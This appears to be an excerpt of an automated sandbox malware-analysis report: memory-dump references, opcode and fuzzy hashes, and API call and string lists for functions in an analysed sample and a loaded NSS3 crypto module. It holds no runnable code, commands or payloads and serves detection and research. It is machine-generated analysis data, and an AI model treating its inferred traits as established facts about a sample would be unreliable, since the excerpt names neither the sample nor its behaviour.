Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90268a1a4e5a069a2f3afbbcb56dee1e70e0524a44356aab665a57a1141eed5a
Instruction ID: 758149b1f43ae4ac6e5426747f5a9c75ca4b880ba41cdbfe6c2635f3e8d3098c
Opcode Fuzzy Hash: 90268a1a4e5a069a2f3afbbcb56dee1e70e0524a44356aab665a57a1141eed5a
Instruction Fuzzy Hash: 3E2108256B8AF206C7558BF8FCD019367D3CB8F31A35D8665EF60C9161C2AD9722C570

Function 6C4B0C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b06f7b2acb1782938c65453f4c0c09ff78133d8028bf3155126f712189c968b
Instruction ID: 7a2448046bbd5c3229b23301685a352228160a145ee0d7a318fb7e2be3b6c349
Opcode Fuzzy Hash: 4b06f7b2acb1782938c65453f4c0c09ff78133d8028bf3155126f712189c968b
Instruction Fuzzy Hash: E811C1B47043058FDB14DF19C880EAA77B1FF85369F148069D8199B701EB71E806CBA1

Function 0061112B Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e47e57290291bf3e55fc76926b40b9455446aaecab0376499f589c11769486e1
Instruction ID: ea3e4387b39ce806ce78312b7a9645757156f0a8d6b1af2c7d6898ca67931afe
Opcode Fuzzy Hash: e47e57290291bf3e55fc76926b40b9455446aaecab0376499f589c11769486e1
Instruction Fuzzy Hash: 77F03072900A19AFD714CFADD5415DFFBF8EB48320B10856ED4AAF3260D630FA458B51

Function 6C4B0D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 644df401444ce3ffdf43625227e117e714c4b559f77d68b3b1970f37203edaaf
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: FAE06D7A202154A7DB14CE09C550EA9735DEF9161BFA4807DCC59ABA41D633F80387A1

Function 00629D78 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
Instruction ID: 81b03007a1f881deed44a42fc0175a6fbd256bce6d09bf2effb1e14420dd7128
Opcode Fuzzy Hash: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
Instruction Fuzzy Hash: DEE04278A55644DFC741CF58D195E99B7F0EB09368F158199E806DB761C274EE00DF00

Function 00629D79 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50

Function 0061147A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58

Function 00611492 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950

Function 0061EC8F Relevance: 90.4, APIs: 60, Instructions: 405memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0061EB72: lstrlenA.KERNEL32(?,?,?,00000000), ref: 0061EBAB
Part of subcall function 0061EB72: strchr.MSVCRT ref: 0061EBBD

GetProcessHeap.KERNEL32(00000008,?,750A5460,?,00000000), ref: 0061ECF3
HeapAlloc.KERNEL32(00000000), ref: 0061ECFA
GetProcessHeap.KERNEL32(00000000,?), ref: 0061ED0F
HeapFree.KERNEL32(00000000), ref: 0061ED16
strcpy_s.MSVCRT ref: 0061ED4C
GetProcessHeap.KERNEL32(00000000,?), ref: 0061ED5E
HeapFree.KERNEL32(00000000), ref: 0061ED6B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0061ED9C
HeapFree.KERNEL32(00000000), ref: 0061EDA3
GetProcessHeap.KERNEL32(00000008,?), ref: 0061EDAA
HeapAlloc.KERNEL32(00000000), ref: 0061EDB1
GetProcessHeap.KERNEL32(00000000,?), ref: 0061EDC6
HeapFree.KERNEL32(00000000), ref: 0061EDCD
strcpy_s.MSVCRT ref: 0061EDE8
GetProcessHeap.KERNEL32(00000000,?), ref: 0061EDFA
HeapFree.KERNEL32(00000000), ref: 0061EE01
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0061EE1F
HeapFree.KERNEL32(00000000), ref: 0061EE26
GetProcessHeap.KERNEL32(00000008,?), ref: 0061EE2D
HeapAlloc.KERNEL32(00000000), ref: 0061EE34
GetProcessHeap.KERNEL32(00000000,?), ref: 0061EE49
HeapFree.KERNEL32(00000000), ref: 0061EE50
strcpy_s.MSVCRT ref: 0061EE63
GetProcessHeap.KERNEL32(00000000,?), ref: 0061EE75
HeapFree.KERNEL32(00000000), ref: 0061EE7C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0061EEA4
HeapFree.KERNEL32(00000000), ref: 0061EEAB
GetProcessHeap.KERNEL32(00000008,?), ref: 0061EEB2
HeapAlloc.KERNEL32(00000000), ref: 0061EEB9
GetProcessHeap.KERNEL32(00000000,?), ref: 0061EED4
HeapFree.KERNEL32(00000000), ref: 0061EEDB
strcpy_s.MSVCRT ref: 0061EEEE
GetProcessHeap.KERNEL32(00000000,?), ref: 0061EF00
HeapFree.KERNEL32(00000000), ref: 0061EF07
lstrlenA.KERNEL32(00000000), ref: 0061EF10
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0061EF23
HeapAlloc.KERNEL32(00000000), ref: 0061EF2A
lstrlenA.KERNEL32(?), ref: 0061EF47
strcpy_s.MSVCRT ref: 0061EF7A
GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 0061EFA0
HeapFree.KERNEL32(00000000), ref: 0061EFA7
lstrlenA.KERNEL32(?), ref: 0061EFAC
GetProcessHeap.KERNEL32(00000008,00000001), ref: 0061EFBB
HeapAlloc.KERNEL32(00000000), ref: 0061EFC2
GetProcessHeap.KERNEL32(00000000,?), ref: 0061EFD6
HeapFree.KERNEL32(00000000), ref: 0061EFDD
strcpy_s.MSVCRT ref: 0061EFEB
GetProcessHeap.KERNEL32(00000000,?), ref: 0061EFF8
HeapFree.KERNEL32(00000000), ref: 0061EFFF
GetProcessHeap.KERNEL32(00000000,?), ref: 0061F034
HeapFree.KERNEL32(00000000), ref: 0061F03B
GetProcessHeap.KERNEL32(00000008,?), ref: 0061F042
HeapAlloc.KERNEL32(00000000), ref: 0061F049
strcpy_s.MSVCRT ref: 0061F064
GetProcessHeap.KERNEL32(00000000,?), ref: 0061F076
HeapFree.KERNEL32(00000000), ref: 0061F07D
GetProcessHeap.KERNEL32(00000000,?), ref: 0061F11E
HeapFree.KERNEL32(00000000), ref: 0061F125

Part of subcall function 0061EB72: strchr.MSVCRT ref: 0061EBE2
Part of subcall function 0061EB72: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0061ECE6,?), ref: 0061EC04
Part of subcall function 0061EB72: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,0061ECE6), ref: 0061EC11
Part of subcall function 0061EB72: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0061ECE6,?), ref: 0061EC18
Part of subcall function 0061EB72: strcpy_s.MSVCRT ref: 0061EC5E

GetProcessHeap.KERNEL32(00000000,?), ref: 0061F16F
HeapFree.KERNEL32(00000000), ref: 0061F176

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$strchr
String ID:
API String ID: 1812599741-0
Opcode ID: 0872798c5019c90a6e8f7e4830d34c284522e89fb95ac2f00f6a0f21adb8b588
Instruction ID: 103233477b5861d598e091e21469818e44ae6551662c72d226ca3f0c29f4d0b7
Opcode Fuzzy Hash: 0872798c5019c90a6e8f7e4830d34c284522e89fb95ac2f00f6a0f21adb8b588
Instruction Fuzzy Hash: E0E12876C04218AFDF21AFF4DC89ADEBB7ABF09301F14446DE615A3122CB7699848F51

Function 6C411D60 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 210COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6C411D46), ref: 6C412345

Strings

CKR_WRAPPING_KEY_TYPE_INCONSISTENT, xrefs: 6C41232E
CKR_STATE_UNSAVEABLE, xrefs: 6C412037
CKR_WRAPPING_KEY_SIZE_RANGE, xrefs: 6C412327
CKR_PIN_LOCKED, xrefs: 6C412075
CKR_MUTEX_NOT_LOCKED, xrefs: 6C412225
CKR_DEVICE_MEMORY, xrefs: 6C411FF3
CKR_WRAPPED_KEY_INVALID, xrefs: 6C411FB5
CKR_NEXT_OTP, xrefs: 6C41222F
CKR_OK, xrefs: 6C411DFC
CKR_ENCRYPTED_DATA_INVALID, xrefs: 6C41226B
CKR_TOKEN_NOT_PRESENT, xrefs: 6C411F81
CKR_PIN_LEN_RANGE, xrefs: 6C412061
CKR_INFORMATION_SENSITIVE, xrefs: 6C4122B1
CKR_FUNCTION_REJECTED, xrefs: 6C412289
CKR_FUNCTION_NOT_PARALLEL, xrefs: 6C41218D
CKR_OPERATION_CANCEL_FAILED, xrefs: 6C411F77
CKR_PIN_INCORRECT, xrefs: 6C411D92
CKR_DEVICE_REMOVED, xrefs: 6C412261
CKR_NEW_PIN_MODE, xrefs: 6C411E9F
CKR_OPERATION_NOT_INITIALIZED, xrefs: 6C411FD7
CKR_SAVED_STATE_INVALID, xrefs: 6C411E56
CKR_MUTEX_BAD, xrefs: 6C411F49
CKR_RANDOM_SEED_NOT_SUPPORTED, xrefs: 6C4122FF
CKR_ENCRYPTED_DATA_LEN_RANGE, xrefs: 6C411F0F
CKR_DEVICE_ERROR, xrefs: 6C41229D
CKR_TOKEN_WRITE_PROTECTED, xrefs: 6C411DE0
CKR_PIN_EXPIRED, xrefs: 6C41206B
CKR_OBJECT_HANDLE_INVALID, xrefs: 6C41204D
CKR_CRYPTOKI_ALREADY_INITIALIZED, xrefs: 6C41227F
CKR_TOKEN_NOT_RECOGNIZED, xrefs: 6C411F8B
CKR_BUFFER_TOO_SMALL, xrefs: 6C412183
CKR_OPERATION_ACTIVE, xrefs: 6C4122B8
CKR_TEMPLATE_INCOMPLETE, xrefs: 6C411F95
CKR_CURVE_NOT_SUPPORTED, xrefs: 6C412179
rv = 0x%x, xrefs: 6C412312
CKR_PIN_INVALID, xrefs: 6C412057
CKR_TOKEN_RESOURCE_EXCEEDED, xrefs: 6C412293, 6C41233F
CKR_WRAPPING_KEY_HANDLE_INVALID, xrefs: 6C412320
CKR_DOMAIN_PARAMS_INVALID, xrefs: 6C412015
rv = %s, xrefs: 6C412340
CKR_CRYPTOKI_NOT_INITIALIZED, xrefs: 6C412275
CKR_TEMPLATE_INCONSISTENT, xrefs: 6C411EE1
CKR_WRAPPED_KEY_LEN_RANGE, xrefs: 6C412319
CKR_RANDOM_NO_RNG, xrefs: 6C4122A7
CKR_SIGNATURE_LEN_RANGE, xrefs: 6C4120D9
CKR_FUNCTION_CANCELED, xrefs: 6C411E73
CKR_SIGNATURE_INVALID, xrefs: 6C4120CF

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Print
String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
API String ID: 3558298466-1980531169
Opcode ID: b3e108e4e39cb039d0481cb588ae794de1f1f382d42f82b082fde32fb440a1fa
Instruction ID: 0f8d8dd6474648457774827bac65fc22a51d5e8919285af4310bb4eccce98404
Opcode Fuzzy Hash: b3e108e4e39cb039d0481cb588ae794de1f1f382d42f82b082fde32fb440a1fa
Instruction Fuzzy Hash: F561EE3064E08886DB3CC66C8AADF7D21E4A753305FA4813BE5C1CEFD5DA69CA434697

Function 6C445DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6C445E08
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C445E3F
PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6C445E5C
free.MOZGLUE(00000000), ref: 6C445E7E
free.MOZGLUE(00000000), ref: 6C445E97
PORT_Strdup_Util.NSS3(secmod.db), ref: 6C445EA5
_NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6C445EBB
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C445ECB
PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6C445EF0
free.MOZGLUE(00000000), ref: 6C445F12
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C445F35
PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6C445F5B
free.MOZGLUE(00000000), ref: 6C445F82
PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6C445FA3
PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6C445FB7
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C445FC4
free.MOZGLUE(00000000), ref: 6C445FDB
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C445FE9
free.MOZGLUE(00000000), ref: 6C445FFE
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C44600C
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C446027
PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6C44605A
PR_smprintf.NSS3(6C51AAF9,00000000), ref: 6C44606A
free.MOZGLUE(00000000), ref: 6C44607C
free.MOZGLUE(00000000), ref: 6C44609A
free.MOZGLUE(00000000), ref: 6C4460B2
free.MOZGLUE(?), ref: 6C4460CE

Strings

secmod.db, xrefs: 6C445EA0
noModDB, xrefs: 6C445EEA
secmod=, xrefs: 6C445FB1
flags, xrefs: 6C445E3A, 6C445EC6, 6C445F30
configDir=, xrefs: 6C445F9D
%s/%s, xrefs: 6C446055
readOnly, xrefs: 6C445E56
pkcs11.txt, xrefs: 6C445F47, 6C445F7C, 6C44603A, 6C446053
forceSecmodChoice, xrefs: 6C445F55

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
